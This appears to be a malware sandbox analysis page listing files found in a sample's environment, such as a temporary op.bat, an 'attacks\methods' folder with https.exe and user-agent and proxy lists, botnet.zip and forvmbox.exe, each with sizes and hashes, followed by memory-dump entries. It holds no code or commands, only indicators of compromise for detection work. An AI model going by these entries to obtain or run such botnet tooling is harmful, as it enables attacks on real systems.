C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
317B

MD5
e439f8bc7d18403684c82c8f639b161b

SHA1
630f17ee33ccf7f96bb428aa31366b000948e83e

SHA256
266a0dd7b6f806e61f035b8d9ff22209687013b6b9cac89e24040a24c60d12ec

SHA512
2ecdce605bd820bceea74dcaa0b8c6924a91fc8f5ece8c6057078a38b43fe6b0ccb2af3ea02783c69feecfb3f0f50684f3a19a046da4170e0646b417662b8acc

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
317B

MD5
e439f8bc7d18403684c82c8f639b161b

SHA1
630f17ee33ccf7f96bb428aa31366b000948e83e

SHA256
266a0dd7b6f806e61f035b8d9ff22209687013b6b9cac89e24040a24c60d12ec

SHA512
2ecdce605bd820bceea74dcaa0b8c6924a91fc8f5ece8c6057078a38b43fe6b0ccb2af3ea02783c69feecfb3f0f50684f3a19a046da4170e0646b417662b8acc

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
317B

MD5
e439f8bc7d18403684c82c8f639b161b

SHA1
630f17ee33ccf7f96bb428aa31366b000948e83e

SHA256
266a0dd7b6f806e61f035b8d9ff22209687013b6b9cac89e24040a24c60d12ec

SHA512
2ecdce605bd820bceea74dcaa0b8c6924a91fc8f5ece8c6057078a38b43fe6b0ccb2af3ea02783c69feecfb3f0f50684f3a19a046da4170e0646b417662b8acc

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
299B

MD5
b66fe4d440c4c5ae07b6cad3deda96bf

SHA1
7e5396d3189cad08df3f0c1f65e33922b9e2a751

SHA256
9b997a688cfe33429f3e82caa85d1ef20fa941850aafe82dade380e784e5e956

SHA512
d5f52743e8963bf57dc28b4afb4556563ab12c908a5afdee413ee0e249ec26cb6f28ea2da59738d9365cadfff71940322cfcf1a162150778755d6f2d499b41bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
285B

MD5
28bcf2490f4dbeef5069ca59d3baacac

SHA1
79a52c91a711fba087445ddb169b4a8da5c02110

SHA256
d2bc935b6a7a80934d686caac8bd7168e6e2de6dfee03233406edc39c6db3719

SHA512
b553340ef8e879f217b41bf2d2c6e30c4dad2e7566317204b9ce8a701a71793adaa465e93ca8a0a700c19ce8a4e3e7153f6571a000a2c2b6e318a2e5bd8a7f2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\AppData\Local\Temp\op.bat

Filesize
292B

MD5
665722db2b35fe4feb368224d9d5e827

SHA1
a542e8f2550630a11bcc0a72cabc421ca50e65ea

SHA256
cd01a9552b15983b31c722f0f2a255416ca36dad5817beda26f4d560f85fa049

SHA512
3a5fd21249651ab8f67264e20a710053303c11cef60738f555700a7ed77aa5b3b7d851a363d15d62a62c60d1b1f8b454fa4f0186bcde3820fa1308c2a5117ca4

Download Submit
C:\Users\Admin\Desktop\attacks\methods\https.exe

Filesize
35.9MB

MD5
70228b5cd219e39ddf20122c56b3866f

SHA1
c3120ad1ca629d707a7220963ad2326c2b096f37

SHA256
a5538de4385e4c1869e63cd3094e8d43efbae23377c153d9ef9ff772f169cfb5

SHA512
bae73c538df3d574451963942048e639f8a1811e0498fd741dc23510dc0702ba5f6553381e81947e9da45059c8b2eda8db75e03dba54dea486c8c87c29a50654

Download Submit
C:\Users\Admin\Desktop\attacks\methods\https.exe

Filesize
35.9MB

MD5
70228b5cd219e39ddf20122c56b3866f

SHA1
c3120ad1ca629d707a7220963ad2326c2b096f37

SHA256
a5538de4385e4c1869e63cd3094e8d43efbae23377c153d9ef9ff772f169cfb5

SHA512
bae73c538df3d574451963942048e639f8a1811e0498fd741dc23510dc0702ba5f6553381e81947e9da45059c8b2eda8db75e03dba54dea486c8c87c29a50654

Download Submit
C:\Users\Admin\Desktop\attacks\methods\https.exe

Filesize
35.9MB

MD5
70228b5cd219e39ddf20122c56b3866f

SHA1
c3120ad1ca629d707a7220963ad2326c2b096f37

SHA256
a5538de4385e4c1869e63cd3094e8d43efbae23377c153d9ef9ff772f169cfb5

SHA512
bae73c538df3d574451963942048e639f8a1811e0498fd741dc23510dc0702ba5f6553381e81947e9da45059c8b2eda8db75e03dba54dea486c8c87c29a50654

Download Submit
C:\Users\Admin\Desktop\attacks\methods\https.exe

Filesize
35.9MB

MD5
70228b5cd219e39ddf20122c56b3866f

SHA1
c3120ad1ca629d707a7220963ad2326c2b096f37

SHA256
a5538de4385e4c1869e63cd3094e8d43efbae23377c153d9ef9ff772f169cfb5

SHA512
bae73c538df3d574451963942048e639f8a1811e0498fd741dc23510dc0702ba5f6553381e81947e9da45059c8b2eda8db75e03dba54dea486c8c87c29a50654

Download Submit
C:\Users\Admin\Desktop\attacks\methods\https.exe

Filesize
35.9MB

MD5
70228b5cd219e39ddf20122c56b3866f

SHA1
c3120ad1ca629d707a7220963ad2326c2b096f37

SHA256
a5538de4385e4c1869e63cd3094e8d43efbae23377c153d9ef9ff772f169cfb5

SHA512
bae73c538df3d574451963942048e639f8a1811e0498fd741dc23510dc0702ba5f6553381e81947e9da45059c8b2eda8db75e03dba54dea486c8c87c29a50654

Download Submit
C:\Users\Admin\Desktop\attacks\methods\https.exe

Filesize
35.9MB

MD5
70228b5cd219e39ddf20122c56b3866f

SHA1
c3120ad1ca629d707a7220963ad2326c2b096f37

SHA256
a5538de4385e4c1869e63cd3094e8d43efbae23377c153d9ef9ff772f169cfb5

SHA512
bae73c538df3d574451963942048e639f8a1811e0498fd741dc23510dc0702ba5f6553381e81947e9da45059c8b2eda8db75e03dba54dea486c8c87c29a50654

Download Submit
C:\Users\Admin\Desktop\attacks\methods\list.txt

Filesize
166KB

MD5
c9ec822e89345dde18682eefc59f5277

SHA1
51886c4a2678d9b90d7254615b833c7183d7f846

SHA256
a3f18997f21d6f962354e6c8addc46899f934d798b142e0d8adad976dfb8a5bc

SHA512
191b2eedf88aa41e6d777bf63628c0417b7694d7dbf75e66f081242f950aba9beb29b3908496fe878f84e57ac7026c46f48d57f12becda525a311713019d2dd7

Download Submit
C:\Users\Admin\Desktop\attacks\methods\tlsv\.git\logs\refs\remotes\origin\HEAD

Filesize
186B

MD5
bfd3d0748ac3a838d224d452d6d5959f

SHA1
9506c3eba5b8fa602290a75597e2ef720767c5d6

SHA256
84ec21b7d8415b974e444e6e230a68a934719a7da452eb0f21ff4ff716e13ba5

SHA512
bef9d23bf2a0a5811c51684e933dba127f817a8dc4b7a0deedbc53af9beb64ab245dfa722b94f10defcbe311b448a6e593173639adb4069d076104ad6848a680

Download Submit
C:\Users\Admin\Desktop\attacks\methods\ua.txt

Filesize
611KB

MD5
14e1ad3a0e97916d917ae0b6687cd200

SHA1
d5154b85ad162f3f5714f9d578dfb4fca9b6af63

SHA256
1a6de1acb8f22f98e2ada85b8cc4a9dab5233c16a60205c726e3366f1d6fc8ff

SHA512
11ddcf49a59f11f619db09e39eb4deb4de80a2c1721452beac8df3cf1ec59c7b9193737beea078a297b6b79adbecf05342e3bac4af26ab9c6e9c60096d01b791

Download Submit
C:\Users\Admin\Desktop\botnet.zip

Filesize
102.2MB

MD5
85b96d8fc5082fcdfa23e010bf0e09b1

SHA1
0dc1081497ba72a3ed819a15ad5d5cd3e881d0ab

SHA256
48e93dc99bc3464f3a7c1e9ca1b35084b267baf5087986360e711e65266e4d23

SHA512
c3688c7e3135c81278c4952bf61aec38ef399f993ffb60d8939fe1e47d9b9adb54f87d14239beb98405d7d63378abfa075a906728c57de7f1dc52c27eea50789

Download Submit
C:\Users\Admin\Desktop\forvmbox.exe

Filesize
92KB

MD5
8c661213d9bbfb8a9a3d42c6b6cb7059

SHA1
9f795650dfbac6f49896026b047d16f3a0c16ec9

SHA256
3a02fcf8821a21bafcdc5273eccce353036dd48ffd5c5f91a1d47e5a9fa243ce

SHA512
d21b5b738857535c6eb181636ab78c08d872d33b5b18dff50ab694f6d1afe335db321767720a0a5ab056c3c03e98195dd4086f7eb8e21abf25ff3c0ac75bf0d4

Download Submit
C:\Users\Admin\Desktop\forvmbox.exe

Filesize
92KB

MD5
8c661213d9bbfb8a9a3d42c6b6cb7059

SHA1
9f795650dfbac6f49896026b047d16f3a0c16ec9

SHA256
3a02fcf8821a21bafcdc5273eccce353036dd48ffd5c5f91a1d47e5a9fa243ce

SHA512
d21b5b738857535c6eb181636ab78c08d872d33b5b18dff50ab694f6d1afe335db321767720a0a5ab056c3c03e98195dd4086f7eb8e21abf25ff3c0ac75bf0d4

Download Submit
memory/4184-168-0x000002557C5E0000-0x000002557C5F0000-memory.dmp

Filesize
64KB

Download
memory/4184-165-0x000002557C5E0000-0x000002557C5F0000-memory.dmp

Filesize
64KB

Download
memory/4184-164-0x000002557C5E0000-0x000002557C5F0000-memory.dmp

Filesize
64KB

Download
memory/4184-161-0x00007FFCB4E80000-0x00007FFCB5941000-memory.dmp

Filesize
10.8MB

Download
memory/4184-287-0x00007FFCB4E80000-0x00007FFCB5941000-memory.dmp

Filesize
10.8MB

Download
memory/4184-149-0x000002557D1A0000-0x000002557D1AA000-memory.dmp

Filesize
40KB

Download
memory/4184-148-0x000002557D1B0000-0x000002557D1C2000-memory.dmp

Filesize
72KB

Download
memory/4184-147-0x000002557C5E0000-0x000002557C5F0000-memory.dmp

Filesize
64KB

Download
memory/4184-146-0x000002557C5E0000-0x000002557C5F0000-memory.dmp

Filesize
64KB

Download
memory/4184-145-0x000002557C5E0000-0x000002557C5F0000-memory.dmp

Filesize
64KB

Download
memory/4184-144-0x00007FFCB4E80000-0x00007FFCB5941000-memory.dmp

Filesize
10.8MB

Download
memory/4184-143-0x000002557CFE0000-0x000002557D002000-memory.dmp

Filesize
136KB

Download